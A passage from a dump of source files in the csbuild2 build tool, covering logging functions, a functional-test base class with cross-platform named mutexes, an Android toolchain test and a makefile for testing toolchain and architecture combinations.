Linker(msg, *args, **kwargs):\n\t\"\"\"\n\tLog info related to linking\n\n\t:param msg: Text to log\n\t:type msg: str\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, *args, **kwargs)\n\t_logMsg(Color.GREEN, \"LINKER\", msg, Verbosity.Quiet)\n\n\ndef Thread(msg, *args, **kwargs):\n\t\"\"\"\n\tLog info related to threads, particularly stalls caused by waiting on another thread to finish\n\n\t:param msg: Text to log\n\t:type msg: str\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, *args, **kwargs)\n\t_logMsg(Color.BLUE, \"THREAD\", msg, Verbosity.Quiet)\n\n\ndef Install(msg, *args, **kwargs):\n\t\"\"\"\n\tLog info related to the installer\n\n\t:param msg: Text to log\n\t:type msg: str\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, *args, **kwargs)\n\t_logMsg(Color.WHITE, \"INSTALL\", msg, Verbosity.Quiet)\n\n\ndef Command(msg, *args, **kwargs):\n\t\"\"\"\n\tLog info related to executing commands\n\n\t:param msg: Text to log\n\t:type msg: str\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, *args, **kwargs)\n\t_logMsg(Color.YELLOW, \"COMMAND\", msg, Verbosity.Quiet)\n\n\ndef Custom(color, name, msg, *args, **kwargs):\n\t\"\"\"\n\tLog info related to some custom aspect of a build tool\n\n\t:param color: Color to log with, taken from csbuild.log.Color\n\t:type color: varies by platform. 
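The same logical color names are accepted on every platform; only the underlying console codes differ. 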
Options are documented in csbuild._utils.terminfo.TermColor, but exposed through log via log.Color\n\t:param name: Name of the log level (i.e., \"BUILD\", \"INSTALL\", etc)\n\t:type name: str\n\t:param msg: Text to log\n\t:type msg: str\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, *args, **kwargs)\n\t_logMsg(color, name, msg, Verbosity.Quiet)\n\ndef Stdout(msg, *args, **kwargs):\n\t\"\"\"\n\tLog a message directly to stdout, with no log level prefix or timestamp\n\n\t:param msg: Text to log\n\t:type msg: str\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, showTime=False, *args, **kwargs)\n\t_logMsg(None, None, msg, Verbosity.Mute)\n\ndef Stderr(msg, *args, **kwargs):\n\t\"\"\"\n\tLog a message directly to stderr, with no log level prefix or timestamp\n\n\t:param msg: Text to log\n\t:type msg: str\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, showTime=False, *args, **kwargs)\n\t_logMsgToStderr(None, None, msg, Verbosity.Mute)\n" }, { "alpha_fraction": 0.7086004018783569, "alphanum_fraction": 0.7117165327072144, "avg_line_length": 31.275861740112305, "blob_id": "647001e88bf3f1d01c00343bb78e4ad8e148cd56", "content_id": "b79c0ae452de14399b8421d439c17cb8c0a2e039", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11232, "license_type": "permissive", "max_line_length": 169, "num_lines": 348, "path": "/csbuild/_testing/functional_test.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: functional_test\n\t:synopsis: A base class for functional tests, which will execute makefiles\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport sys\nimport threading\nimport shutil\nimport platform\nimport re\n\nfrom .testcase import TestCase\nfrom .. 
import log, commands\nfrom .._utils import PlatformString, queue\nfrom .._utils.string_abc import String\n\nif platform.system() == \"Windows\":\n\t# pylint: disable=import-error\n\timport ctypes\n\tfrom ctypes import wintypes\n\t# Create ctypes wrapper for Win32 functions we need, with correct argument/return types\n\t_CreateMutex = ctypes.windll.kernel32.CreateMutexA\n\t_CreateMutex.argtypes = [wintypes.LPCVOID, wintypes.BOOL, wintypes.LPCSTR]\n\t_CreateMutex.restype = wintypes.HANDLE\n\n\t_WaitForSingleObject = ctypes.windll.kernel32.WaitForSingleObject\n\t_WaitForSingleObject.argtypes = [wintypes.HANDLE, wintypes.DWORD]\n\t_WaitForSingleObject.restype = wintypes.DWORD\n\n\t_ReleaseMutex = ctypes.windll.kernel32.ReleaseMutex\n\t_ReleaseMutex.argtypes = [wintypes.HANDLE]\n\t_ReleaseMutex.restype = wintypes.BOOL\n\n\t_CloseHandle = ctypes.windll.kernel32.CloseHandle\n\t_CloseHandle.argtypes = [wintypes.HANDLE]\n\t_CloseHandle.restype = wintypes.BOOL\n\n\tclass _namedMutex(object):\n\t\t# pylint: disable=invalid-name\n\t\t\"\"\"Represents a named synchronization primitive - a named mutex in windows, a file lock in linux\"\"\"\n\t\tdef __init__(self, name):\n\t\t\t# Backslashes not ok. Forward slashes are fine.\n\t\t\tself.name = \"csbuild/\"+name.replace(\"\\\\\", \"/\")\n\t\t\tif sys.version_info[0] >= 3:\n\t\t\t\tself.name = self.name.encode(\"UTF-8\")\n\t\t\tret = _CreateMutex(None, False, self.name)\n\t\t\tif not ret:\n\t\t\t\traise ctypes.WinError()\n\t\t\tself.handle = ret\n\n\t\tdef acquire(self):\n\t\t\t\"\"\"Acquire the lock\"\"\"\n\t\t\ttimeout = 0xFFFFFFFF\n\t\t\tret = _WaitForSingleObject(self.handle, timeout)\n\t\t\tif ret not in (0, 0x80, 0x102):\n\t\t\t\t# Waiting failed\n\t\t\t\traise ctypes.WinError()\n\n\t\tdef release(self):\n\t\t\t\"\"\"Release the lock\"\"\"\n\t\t\tret = _ReleaseMutex(self.handle)\n\t\t\tif not ret:\n\t\t\t\traise ctypes.WinError()\n\n\t\tdef close(self):\n\t\t\t\"\"\"Close the lock\"\"\"\n\t\t\tret = _CloseHandle(self.handle)\n\t\t\tif not ret:\n\t\t\t\traise ctypes.WinError()\n\n\t\tdef __enter__(self):\n\t\t\tself.acquire()\n\n\t\tdef __exit__(self, excType, excVal, tb):\n\t\t\tself.release()\n\t\t\treturn False\nelse:\n\timport fcntl # pylint: disable=import-error\n\timport tempfile\n\n\tclass _namedMutex(object):\n\t\t# pylint: disable=invalid-name\n\t\t\"\"\"Represents a named synchronization primitive - a named mutex in windows, a file lock in linux\"\"\"\n\t\tdef __init__(self, name):\n\t\t\tself.name = os.path.join(tempfile.gettempdir(), name)\n\t\t\tdirname = os.path.dirname(self.name)\n\t\t\tif not os.access(dirname, os.F_OK):\n\t\t\t\tos.makedirs(dirname)\n\t\t\tself.handle = open(self.name, 'w')\n\n\t\tdef acquire(self):\n\t\t\t\"\"\"Acquire the lock\"\"\"\n\t\t\tfcntl.flock(self.handle, fcntl.LOCK_EX)\n\n\t\tdef release(self):\n\t\t\t\"\"\"Release the lock\"\"\"\n\t\t\tfcntl.flock(self.handle, fcntl.LOCK_UN)\n\n\t\tdef close(self):\n\t\t\t\"\"\"Close the lock\"\"\"\n\t\t\tself.handle.close()\n\n\t\tdef __enter__(self):\n\t\t\tself.acquire()\n\n\t\tdef __exit__(self, excType, excVal, tb):\n\t\t\tself.release()\n\t\t\treturn False\n\ndef ListFiles(startpath):\n\t\"\"\"\n\tList the files in a directory in a nice tree structure\n\t:param startpath: Directory\n\t:type startpath: str\n\t:return: String representation of the directory structure\n\t:rtype: str\n\t\"\"\"\n\tret = \"\"\n\tfor root, _, files in os.walk(startpath):\n\t\tlevel = root.replace(startpath, '').count(os.sep)\n\t\tindent = ' ' * 4 * (level)\n\t\tret += 
'{}{}/\\n'.format(indent, os.path.basename(root))\n\t\tsubindent = ' ' * 4 * (level + 1)\n\t\tfor f in files:\n\t\t\tret += '{}{}\\n'.format(subindent, f)\n\treturn ret\n\nclass FunctionalTest(TestCase):\n\t\"\"\"\n\tBase class for running functional tests that invoke an actual makefile.\n\t\"\"\"\n\tdef setUp(self, outDir=\"out\", intermediateDir=\"intermediate\", cleanAtEnd=True, cleanArgs=None): #pylint: disable=arguments-differ\n\t\tself._prevdir = os.getcwd()\n\n\t\tif os.getenv(PlatformString(\"CSBUILD_RUNNING_THROUGH_PYTHON_UNITTEST\")) != PlatformString(\"1\"):\n\t\t\tmodule = __import__(self.__class__.__module__)\n\t\t\tpath = os.path.dirname(module.__file__)\n\t\telse:\n\t\t\tpath = os.path.dirname(self.__class__.__module__.replace('.', os.path.sep))\n\n\t\tself.mtx = _namedMutex(os.path.join(path, \"lock\"))\n\t\tself.mtx.acquire()\n\n\t\tif PlatformString(\"CSBUILD_NO_AUTO_RUN\") in os.environ:\n\t\t\tself._oldenviron = os.environ[PlatformString(\"CSBUILD_NO_AUTO_RUN\")]\n\t\t\tdel os.environ[PlatformString(\"CSBUILD_NO_AUTO_RUN\")]\n\t\telse:\n\t\t\tself._oldenviron = None\n\n\t\tif not os.path.exists(path):\n\t\t\tpath = os.path.join(\"functional_tests\", path)\n\t\tos.chdir(path)\n\n\t\tself.outDir = outDir\n\t\tself.intermediateDir = intermediateDir\n\t\tself.cleanAtEnd = cleanAtEnd\n\n\t\tself.cleanArgs = cleanArgs\n\n\t\t# Make sure we start in a good state\n\t\tif os.access(outDir, os.F_OK):\n\t\t\tshutil.rmtree(outDir)\n\t\tif os.access(intermediateDir, os.F_OK):\n\t\t\tshutil.rmtree(intermediateDir)\n\t\tif os.access(\".csbuild\", os.F_OK):\n\t\t\tshutil.rmtree(\".csbuild\")\n\n\tdef tearDown(self):\n\t\ttry:\n\t\t\tif self.cleanAtEnd:\n\t\t\t\tif self.cleanArgs is not None:\n\t\t\t\t\tself.RunMake(\"--clean\", *self.cleanArgs)\n\t\t\t\telse:\n\t\t\t\t\tself.RunMake(\"--clean\")\n\t\t\t\tif os.access(self.outDir, os.F_OK):\n\t\t\t\t\tself.fail(\"Out dir not removed by clean:\\n{}\".format(ListFiles(self.outDir)))\n\t\t\t\tif os.access(self.intermediateDir, os.F_OK):\n\t\t\t\t\tself.fail(\"Intermediate dir not removed by clean:\\n{}\".format(ListFiles(self.intermediateDir)))\n\t\tfinally:\n\t\t\tos.chdir(self._prevdir)\n\t\t\tif self._oldenviron is not None:\n\t\t\t\tos.environ[PlatformString(\"CSBUILD_NO_AUTO_RUN\")] = self._oldenviron\n\t\t\tself.mtx.release()\n\t\t\tself.mtx.close()\n\n\tdef RunMake(self, *args):\n\t\t\"\"\"\n\t\tRun the test's local makefile with the given args. 
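A hypothetical invocation is ``self.RunMake(\"--project=hello_world\", \"-v\")``, which returns the returncode along with captured stdout and stderr. 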
The makefile must be in the same directory and named make.py\n\t\t:param args: Arguments to pass\n\t\t:type args: str\n\t\t:return: Tuple of returncode, stdout and stderr output from the process\n\t\t:rtype: tuple[int, str, str]\n\t\t\"\"\"\n\t\tcommands.queueOfLogQueues = queue.Queue()\n\t\toutputThread = threading.Thread(target=commands.PrintStaggeredRealTimeOutput)\n\t\toutputThread.start()\n\n\t\tcallbackQueue = queue.Queue()\n\t\tlog.SetCallbackQueue(callbackQueue)\n\n\t\tclass _shared(object):\n\t\t\tret = (0, \"\", \"\")\n\n\t\tdef _runCommand():\n\t\t\tcmd = [sys.executable, os.path.abspath(\"make.py\")]\n\t\t\tcmd.extend(args)\n\t\t\tcmd.append(\"--force-progress-bar=off\")\n\n\t\t\tdef _handleStdout(shared, msg):\n\t\t\t\tcommands.DefaultStdoutHandler(shared, \" {}\".format(msg))\n\n\t\t\tdef _handleStderr(shared, msg):\n\t\t\t\tcommands.DefaultStderrHandler(shared, \" {}\".format(msg))\n\n\t\t\t_shared.ret = commands.Run(cmd, stdout=_handleStdout, stderr=_handleStderr, cwd=os.getcwd(), env=os.environ)\n\t\t\tcallbackQueue.Put(commands.stopEvent)\n\n\t\tcommandThread = threading.Thread(target=_runCommand)\n\t\tcommandThread.start()\n\t\twhile True:\n\t\t\tcallback = callbackQueue.GetBlocking()\n\n\t\t\tif callback is commands.stopEvent:\n\t\t\t\tbreak\n\t\t\tcallback()\n\n\t\tcommands.queueOfLogQueues.Put(commands.stopEvent)\n\t\toutputThread.join()\n\t\tlog.SetCallbackQueue(None)\n\n\t\tcommandThread.join()\n\n\t\tansiEscape = re.compile(r'\\x1b[^m]*m')\n\t\treturncode, output, errors = _shared.ret\n\t\toutput = ansiEscape.sub(\"\", output)\n\t\terrors = ansiEscape.sub(\"\", errors)\n\t\treturn returncode, output, errors\n\n\t# pylint: disable=invalid-name\n\tdef assertMakeSucceeds(self, *args):\n\t\t\"\"\"\n\t\tAssert that running a makefile succeeds\n\t\t:param args: Arguments to pass\n\t\t:type args: str\n\t\t:return: Tuple of returncode, stdout and stderr output from the process\n\t\t:rtype: tuple[int, str, str]\n\t\t\"\"\"\n\t\treturncode, output, errors = self.RunMake(*args)\n\t\tself.assertEqual(returncode, 0)\n\t\treturn returncode, output, errors\n\n\tdef assertMakeRaises(self, error, *args):\n\t\t\"\"\"\n\t\tAssert that running a makefile fails with the given exception\n\t\t:param args: Arguments to pass\n\t\t:type args: str\n\t\t:param error: Error or exception to search for in the logs\n\t\t:type error: Exception or str\n\t\t:return: Tuple of returncode, stdout and stderr output from the process\n\t\t:rtype: tuple[int, str, str]\n\t\t\"\"\"\n\t\treturncode, output, errors = self.RunMake(*args)\n\t\tself.assertNotEqual(returncode, 0)\n\t\tif not isinstance(error, String):\n\t\t\terror = error.__name__\n\t\tself.assertIn(error, errors)\n\t\treturn returncode, output, errors\n\n\tdef assertMakeFails(self, error, *args):\n\t\t\"\"\"\n\t\tAssert that running a makefile fails with the given csbuild error\n\t\t:param args: Arguments to pass\n\t\t:type args: str\n\t\t:param error: Error regular expression to search for in the logs\n\t\t:type error: str\n\t\t:return: Tuple of returncode, stdout and stderr output from the process\n\t\t:rtype: tuple[int, str, str]\n\t\t\"\"\"\n\t\treturncode, output, errors = self.RunMake(*args)\n\t\tself.assertNotEqual(returncode, 0)\n\t\terror = re.compile(error)\n\t\toutMatch = error.search(output)\n\t\terrMatch = error.search(errors)\n\t\tself.assertTrue(outMatch is not None or errMatch is not None)\n\t\treturn returncode, output, errors\n\n\tdef assertFileExists(self, filename):\n\t\t\"\"\"\n\t\tAssert that an expected file 
exists\n\t\t:param filename: file to check\n\t\t:type filename: str\n\t\t\"\"\"\n\t\tself.assertTrue(os.access(filename, os.F_OK), \"No such file: {}\".format(filename))\n\n\tdef assertFileDoesNotExist(self, filename):\n\t\t\"\"\"\n\t\tAssert that an expected file doesn't exist\n\t\t:param filename: file to check\n\t\t:type filename: str\n\t\t\"\"\"\n\t\tself.assertFalse(os.access(filename, os.F_OK), \"File exists: {}\".format(filename))\n\n\tdef assertFileIsExecutable(self, filename):\n\t\t\"\"\"\n\t\tAssert that an expected file is executable\n\t\t:param filename: file to check\n\t\t:type filename: str\n\t\t\"\"\"\n\t\tself.assertTrue(os.access(filename, os.X_OK), \"No such executable file: {}\".format(filename))\n\n\t# pylint: disable=invalid-name\n\tdef assertFileContents(self, filename, expectedContents):\n\t\t\"\"\"\n\t\tAssert that an expected file exists and its contents are as expected\n\t\t:param filename: file to check\n\t\t:type filename: str\n\t\t:param expectedContents: Contents to check against\n\t\t:type expectedContents: str\n\t\t\"\"\"\n\t\tself.assertFileExists(filename)\n\t\twith open(filename, \"r\") as f:\n\t\t\tfoundContents = f.read()\n\t\t\tself.assertEqual(expectedContents, foundContents, \"File {} did not contain expected contents (Expected {}, got {})\".format(filename, expectedContents, foundContents))\n" }, { "alpha_fraction": 0.7398805618286133, "alphanum_fraction": 0.7451891303062439, "avg_line_length": 39.186668395996094, "blob_id": "e1b3706fcc7352974b898b6fc0e179510915d2f8", "content_id": "a139e2a9c0ac3a18054b934b70277c8691c28951", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3014, "license_type": "no_license", "max_line_length": 139, "num_lines": 75, "path": "/functional_tests/android_test/tests.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: tests\n\t:synopsis: Basic test of the Android toolchain\n\n.. moduleauthor:: Jaedyn K. 
Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom csbuild._testing.functional_test import FunctionalTest\n\nimport os\nimport unittest\n\[email protected](\"ANDROID_NDK_ROOT\" in os.environ and \"ANDROID_HOME\" in os.environ, \"ANDROID_NDK_ROOT and/or ANDROID_HOME not defined\")\nclass AndroidTest(FunctionalTest):\n\t\"\"\"Android functional test\"\"\"\n\n\t# pylint: disable=invalid-name\n\tdef setUp(self): # pylint: disable=arguments-differ\n\t\tself.outputFile = \"out/hello_world.so\"\n\t\toutDir = \"out\"\n\t\tFunctionalTest.setUp(self, outDir=outDir)\n\n\tdef testClangX86CompileSucceeds(self):\n\t\t\"\"\"Test that the project succesfully compiles\"\"\"\n\t\ttestArgs = [\"--project=hello_world\", \"--arch=x86\", \"--toolchain=android-clang\"]\n\t\tself.cleanArgs = testArgs\n\t\tself.assertMakeSucceeds(\"-v\", \"--show-commands\", *testArgs)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\n\tdef testClangX64CompileSucceeds(self):\n\t\t\"\"\"Test that the project succesfully compiles\"\"\"\n\t\ttestArgs = [\"--project=hello_world\", \"--arch=x64\", \"--toolchain=android-clang\"]\n\t\tself.cleanArgs = testArgs\n\t\tself.assertMakeSucceeds(\"-v\", \"--show-commands\", *testArgs)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\n\tdef testClangArmCompileSucceeds(self):\n\t\t\"\"\"Test that the project succesfully compiles\"\"\"\n\t\ttestArgs = [\"--project=hello_world\", \"--arch=arm\", \"--toolchain=android-clang\"]\n\t\tself.cleanArgs = testArgs\n\t\tself.assertMakeSucceeds(\"-v\", \"--show-commands\", *testArgs)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\n\tdef testClangArm64CompileSucceeds(self):\n\t\t\"\"\"Test that the project succesfully compiles\"\"\"\n\t\ttestArgs = [\"--project=hello_world\", \"--arch=arm64\", \"--toolchain=android-clang\"]\n\t\tself.cleanArgs = testArgs\n\t\tself.assertMakeSucceeds(\"-v\", \"--show-commands\", *testArgs)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n" }, { "alpha_fraction": 0.7404751181602478, "alphanum_fraction": 0.7431644797325134, "avg_line_length": 36.18333435058594, "blob_id": "73ee8a1fb801c2f0c3fcb589fd70d57a9007af5b", "content_id": "794e4c69513f580b85c12966d268243745924a42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6693, "license_type": "no_license", "max_line_length": 152, "num_lines": 180, "path": "/functional_tests/toolchain_architecture_combinations_test/make.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: make\n\t:synopsis: Makefile for this test\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nfrom csbuild.toolchain import Tool\nimport os\n\ncsbuild.SetOutputDirectory(\"out\")\n\nclass WriteOutput(Tool):\n\t\"\"\"Dummy class\"\"\"\n\tinputFiles = None\n\n\tdef __init__(self, projectSettings, ext):\n\t\tself._ext = ext\n\t\tTool.__init__(self, projectSettings)\n\n\tdef Run(self, inputProject, inputFile):\n\t\toutFile = os.path.join(inputProject.outputDir, \".\".join([inputProject.outputName, inputProject.architectureName, inputProject.targetName, self._ext]))\n\t\tcsbuild.log.Build(\"Writing {}\", outFile)\n\t\twith open(outFile, \"w\") as f:\n\t\t\tf.write(\"foo\")\n\t\t\tf.flush()\n\t\t\tos.fsync(f.fileno())\n\t\treturn outFile\n\nclass WriteA(WriteOutput):\n\t\"\"\"Dummy class\"\"\"\n\tsupportedArchitectures = {\"A\", \"B\", \"C\", \"D\"}\n\toutputFiles = {\".A\"}\n\tdef __init__(self, projectSettings):\n\t\tWriteOutput.__init__(self, projectSettings, \"A\")\n\nclass WriteB(WriteOutput):\n\t\"\"\"Dummy class\"\"\"\n\tsupportedArchitectures = {\"A\", \"B\", \"C\", \"D\"}\n\toutputFiles = {\".B\"}\n\tdef __init__(self, projectSettings):\n\t\tWriteOutput.__init__(self, projectSettings, \"B\")\n\nclass WriteC(WriteOutput):\n\t\"\"\"Dummy class\"\"\"\n\tsupportedArchitectures = {\"A\", \"B\", \"C\", \"D\"}\n\toutputFiles = {\".C\"}\n\tdef __init__(self, projectSettings):\n\t\tWriteOutput.__init__(self, projectSettings, \"C\")\n\nclass WriteD(WriteOutput):\n\t\"\"\"Dummy class\"\"\"\n\tsupportedArchitectures = {\"A\", \"B\", \"C\", \"D\", \"E\"}\n\toutputFiles = {\".D\"}\n\tdef __init__(self, projectSettings):\n\t\tWriteOutput.__init__(self, projectSettings, \"D\")\n\nclass WriteWindows(WriteOutput):\n\t\"\"\"Dummy class\"\"\"\n\tsupportedArchitectures = {\"A\", \"B\", \"C\", \"D\"}\n\tsupportedPlatforms = {\"Windows\"}\n\toutputFiles = {\".Windows\"}\n\tdef __init__(self, projectSettings):\n\t\tWriteOutput.__init__(self, projectSettings, \"Windows\")\n\nclass WriteLinux(WriteOutput):\n\t\"\"\"Dummy class\"\"\"\n\tsupportedArchitectures = {\"A\", \"B\", \"C\", \"D\"}\n\tsupportedPlatforms = {\"Linux\"}\n\toutputFiles = {\".Linux\"}\n\tdef __init__(self, projectSettings):\n\t\tWriteOutput.__init__(self, projectSettings, \"Linux\")\n\nclass WriteMacOs(WriteOutput):\n\t\"\"\"Dummy class\"\"\"\n\tsupportedArchitectures = {\"A\", \"B\", \"C\", \"D\"}\n\tsupportedPlatforms = {\"Darwin\"}\n\toutputFiles = {\".Darwin\"}\n\tdef __init__(self, projectSettings):\n\t\tWriteOutput.__init__(self, projectSettings, \"Darwin\")\n\ncsbuild.RegisterToolchain(\"A\", \"A\", WriteA)\ncsbuild.RegisterToolchain(\"B\", \"B\", WriteB)\ncsbuild.RegisterToolchain(\"C\", \"C\", WriteC)\ncsbuild.RegisterToolchain(\"D\", \"D\", WriteD)\ncsbuild.RegisterToolchain(\"Windows\", \"A\", WriteWindows)\ncsbuild.RegisterToolchain(\"Linux\", \"A\", WriteLinux)\ncsbuild.RegisterToolchain(\"Darwin\", \"A\", WriteMacOs)\n\ncsbuild.SetDefaultToolchain(\"A\")\ncsbuild.SetDefaultTarget(\"A\")\n\nwith csbuild.Target(\"A\"):\n\tpass\n\nwith csbuild.Target(\"B\"):\n\tpass\n\nwith csbuild.Project(\"AlwaysWorks\", \".\", 
autoDiscoverSourceFiles=False):\n\tcsbuild.SetOutput(\"foo\", csbuild.ProjectType.Application)\n\nwith csbuild.Project(\"ProjectWithLimitedArchitectures\", \".\", autoDiscoverSourceFiles=False):\n\tcsbuild.SetSupportedArchitectures(\"A\", \"B\", \"C\")\n\tcsbuild.SetOutput(\"arch\", csbuild.ProjectType.Application)\n\nwith csbuild.Architecture(\"A\", \"B\", \"C\"):\n\twith csbuild.Project(\"ProjectWithLimitedArchitectures2\", \".\", autoDiscoverSourceFiles=False):\n\t\tcsbuild.SetOutput(\"arch2\", csbuild.ProjectType.Application)\n\nwith csbuild.Project(\"ProjectWithExcludedTarget\", \".\", autoDiscoverSourceFiles=False):\n\tcsbuild.SetSupportedTargets(\"A\")\n\tcsbuild.SetOutput(\"target\", csbuild.ProjectType.Application)\n\nwith csbuild.Target(\"A\"):\n\twith csbuild.Project(\"ProjectWithExcludedTarget2\", \".\", autoDiscoverSourceFiles=False):\n\t\tcsbuild.SetOutput(\"target2\", csbuild.ProjectType.Application)\n\nwith csbuild.Project(\"ProjectWithSpecialTarget\", \".\", autoDiscoverSourceFiles=False):\n\twith csbuild.Target(\"special\"):\n\t\tcsbuild.SetOutput(\"special\", csbuild.ProjectType.Application)\n\tcsbuild.SetOutput(\"unspecial\", csbuild.ProjectType.Application)\n\nwith csbuild.Target(\"special\", addToCurrentScope=False):\n\twith csbuild.Project(\"ProjectWithSpecialTarget2\", \".\", autoDiscoverSourceFiles=False):\n\t\tcsbuild.SetOutput(\"special2\", csbuild.ProjectType.Application)\n\nwith csbuild.Project(\"LimitedToolchains\", \".\", autoDiscoverSourceFiles=False):\n\tcsbuild.SetSupportedToolchains(\"B\", \"C\", \"D\")\n\tcsbuild.SetOutput(\"toolchain\", csbuild.ProjectType.Application)\n\nwith csbuild.Toolchain(\"B\", \"C\", \"D\"):\n\twith csbuild.Project(\"LimitedToolchains2\", \".\", autoDiscoverSourceFiles=False):\n\t\tcsbuild.SetOutput(\"toolchain2\", csbuild.ProjectType.Application)\n\nwith csbuild.Project(\"WindowsProject\", \".\", autoDiscoverSourceFiles=False):\n\tcsbuild.SetSupportedPlatforms(\"Windows\")\n\tcsbuild.SetOutput(\"Windows\", csbuild.ProjectType.Application)\n\nwith csbuild.Project(\"LinuxProject\", \".\", autoDiscoverSourceFiles=False):\n\tcsbuild.SetSupportedPlatforms(\"Linux\")\n\tcsbuild.SetOutput(\"Linux\", csbuild.ProjectType.Application)\n\nwith csbuild.Project(\"MacProject\", \".\", autoDiscoverSourceFiles=False):\n\tcsbuild.SetSupportedPlatforms(\"Darwin\")\n\tcsbuild.SetOutput(\"Darwin\", csbuild.ProjectType.Application)\n\nwith csbuild.Platform(\"Windows\"):\n\twith csbuild.Project(\"WindowsProject2\", \".\", autoDiscoverSourceFiles=False):\n\t\tcsbuild.SetOutput(\"Windows2\", csbuild.ProjectType.Application)\n\nwith csbuild.Platform(\"Linux\"):\n\twith csbuild.Project(\"LinuxProject2\", \".\", autoDiscoverSourceFiles=False):\n\t\tcsbuild.SetOutput(\"Linux2\", csbuild.ProjectType.Application)\n\nwith csbuild.Platform(\"Darwin\"):\n\twith csbuild.Project(\"DarwinProject2\", \".\", autoDiscoverSourceFiles=False):\n\t\tcsbuild.SetOutput(\"Darwin2\", csbuild.ProjectType.Application)\n" }, { "alpha_fraction": 0.7145286798477173, "alphanum_fraction": 0.7196307182312012, "avg_line_length": 34.79130554199219, "blob_id": "a297689f18fc31b4994afff531d7ca75bd23ce92", 